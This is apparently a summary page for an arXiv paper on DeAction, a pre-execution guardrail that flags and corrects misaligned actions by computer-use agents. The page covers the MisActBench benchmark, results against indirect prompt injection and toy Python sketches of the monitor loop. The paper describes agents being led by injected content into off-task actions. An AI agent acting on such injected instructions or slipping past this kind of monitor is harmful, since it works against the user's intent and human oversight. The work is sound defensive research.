[Paper] When Actions Go Off-Task: Detecting and Correcting Misaligned Actions in Computer-Use Agents

Published: February 9, 2026 at 01:41 PM EST
4 min read
Source: arXiv

Overview

The paper When Actions Go Off-Task: Detecting and Correcting Misaligned Actions in Computer‑Use Agents tackles a problem that’s becoming increasingly visible as large‑language‑model (LLM)‑driven assistants start to control real software: agents often execute actions that don’t match the user’s intent. These “misaligned” actions can be caused by malicious prompt injections or simple reasoning errors, leading to safety hazards and wasted time. The authors introduce a systematic way to detect such actions and a guard‑rail framework—DeAction—that can stop and fix them before they run.

Key Contributions

  • Formal definition of misaligned actions for computer‑use agents, covering both external attacks and internal reasoning failures.
  • MisActBench, a new benchmark containing realistic interaction trajectories with human‑annotated, step‑by‑step alignment labels.
  • DeAction, a universal, lightweight guard‑rail that (1) detects misaligned actions pre‑execution and (2) iteratively corrects them via structured feedback.
  • Empirical validation showing >15 % absolute improvement in F1 over prior baselines on MisActBench and >90 % reduction in attack success rate in live tests, all with modest latency overhead.

Methodology

  1. Problem framing – The authors treat each agent‑generated action (e.g., a CLI command, a mouse click) as a candidate that must be verified against the user’s original goal.
  2. Dataset construction – Real‑world usage logs from several computer‑use agent (CUA) deployments were collected, and crowd‑sourced annotators labeled each action as aligned or misaligned. The resulting MisActBench contains thousands of multi‑step sessions spanning domains such as file management, web browsing, and IDE usage.
  3. DeAction architecture
    • Detection module: a lightweight LLM (or fine‑tuned classifier) that receives the user query, the agent’s internal plan, and the proposed next action, and outputs a binary “aligned?” score plus a confidence estimate.
    • Correction loop: if the action is flagged, DeAction prompts the underlying agent to re‑reason with a structured feedback message (e.g., “Your proposed command deletes *.log files, but the user only asked to clean temporary files”). The agent then generates a revised action. This loop repeats until the detector is satisfied or a max‑retry limit is hit.
  4. Evaluation – Both offline (benchmark scoring) and online (real‑time interaction with a sandboxed CUA) experiments were run, comparing DeAction against static rule‑based filters, post‑hoc verification, and prior alignment‑checking baselines.
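The detect‑then‑correct loop in step 3 can be sketched in a few lines of Python. Everything below (the `detect` rule, the `revise` step, the function names) is a hypothetical stand‑in for the paper's LLM‑based components, not the authors' implementation:

```python
from dataclasses import dataclass

@dataclass
class Verdict:
    aligned: bool
    confidence: float
    feedback: str = ""

def detect(goal: str, plan: str, action: str) -> Verdict:
    # Toy stand-in for the detection module: flag actions that touch
    # *.log files when the user's goal never mentions logs.
    if "*.log" in action and "log" not in goal:
        return Verdict(False, 0.9,
                       "Your proposed command deletes *.log files, "
                       "but the user only asked to clean temporary files.")
    return Verdict(True, 0.8)

def revise(action: str, feedback: str) -> str:
    # A real agent would re-reason over the structured feedback;
    # here we just substitute the offending glob.
    return action.replace("*.log", "*.tmp")

def guarded_step(goal: str, plan: str, action: str, max_retries: int = 3):
    """Pre-execution gate: verify the action, iteratively correct it."""
    for _ in range(max_retries):
        verdict = detect(goal, plan, action)
        if verdict.aligned:
            return action          # safe to execute
        action = revise(action, verdict.feedback)
    return None                    # retries exhausted: block execution

print(guarded_step("clean temporary files", "remove build leftovers", "rm *.log"))
# → rm *.tmp
```

The key design point mirrored here is that the gate sits *before* execution: a misaligned action is never run, only revised or (after the retry limit) blocked.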

Results & Findings

Metric                                           Baseline (best)   DeAction
F1 (misalignment detection)                      0.68              0.84 (+15 % absolute)
Attack success rate (indirect prompt injection)  0.42              0.04 (−90 %)
Task success rate (benign queries)               0.91              0.92 (slight gain)
Average latency per step                         120 ms            ≈180 ms (≈60 ms overhead)

Key takeaways: DeAction catches the majority of malicious or erroneous actions before they affect the system, while its iterative feedback often nudges the agent toward a better solution, sometimes even improving overall task success.
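For reference, the detection F1 reported above is the standard harmonic mean of precision and recall over step‑level misalignment labels. A minimal computation (with made‑up labels, not MisActBench data) looks like this:

```python
def f1(labels: list[bool], preds: list[bool]) -> float:
    """F1 over binary labels, where True = misaligned action."""
    tp = sum(l and p for l, p in zip(labels, preds))
    fp = sum((not l) and p for l, p in zip(labels, preds))
    fn = sum(l and (not p) for l, p in zip(labels, preds))
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return 2 * precision * recall / (precision + recall) if precision + recall else 0.0

labels = [True, False, True, True, False]   # human annotations
preds  = [True, False, False, True, True]   # detector outputs
print(round(f1(labels, preds), 3))
# → 0.667
```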

Practical Implications

  • Safer automation pipelines – Integrating DeAction as a pre‑execution gate can protect CI/CD bots, DevOps scripts, or any LLM‑driven automation from accidental destructive commands.
  • Enterprise compliance – Companies can enforce policy constraints (e.g., “no data export to external domains”) by letting DeAction flag violations in real time.
  • Developer tooling – IDE assistants (GitHub Copilot, Cursor) could use DeAction to double‑check file‑system or build‑system actions, reducing the risk of unintended side effects.
  • Adversarial robustness – The framework dramatically lowers the success of indirect prompt‑injection attacks, a growing concern for SaaS products that expose LLM endpoints to end‑users.
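As a concrete illustration of the compliance use case above, a pre‑execution gate can be as simple as pattern rules over proposed shell commands. The policy names and regexes below are invented for illustration and are far weaker than an LLM‑based detector like DeAction's:

```python
import re

# Hypothetical policy table: human-readable policy name -> pattern that
# flags a violating shell command before it runs.
POLICIES = {
    # Flag network-transfer tools unless the target mentions an internal .corp host.
    "no data export to external domains": re.compile(r"\b(curl|scp|rsync)\b(?!.*\.corp\b)"),
    "no recursive force deletes": re.compile(r"\brm\s+-rf\b"),
}

def violated_policies(command: str) -> list[str]:
    """Return the names of any policies the proposed command would break."""
    return [name for name, pattern in POLICIES.items() if pattern.search(command)]

print(violated_policies("curl -d @users.csv https://example.com/upload"))
# → ['no data export to external domains']
print(violated_policies("scp report.pdf backup.corp:/archive/"))
# → []
```

A flagged command would then be routed into a correction loop or surfaced to a human, rather than executed.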

Limitations & Future Work

  • Domain specificity – While MisActBench covers several common desktop tasks, the detection model may need further fine‑tuning for niche domains (e.g., network device configuration).
  • Latency trade‑off – The iterative correction loop adds a small but non‑negligible delay; ultra‑low‑latency use‑cases (e.g., high‑frequency trading bots) might require a more streamlined version.
  • Reliance on LLM reasoning – If the underlying agent’s reasoning is fundamentally flawed, DeAction’s feedback may not converge to a correct action, highlighting the need for stronger internal verification mechanisms.
  • Future directions suggested by the authors include: expanding MisActBench with multimodal actions (e.g., GUI clicks), exploring reinforcement‑learning‑based guardrails that adapt over time, and integrating static code‑analysis tools for deeper safety guarantees.

Authors

  • Yuting Ning
  • Jaylen Jones
  • Zhehao Zhang
  • Chentao Ye
  • Weitong Ruan
  • Junyi Li
  • Rahul Gupta
  • Huan Sun

Paper Information

  • arXiv ID: 2602.08995v1
  • Categories: cs.CL
  • Published: February 9, 2026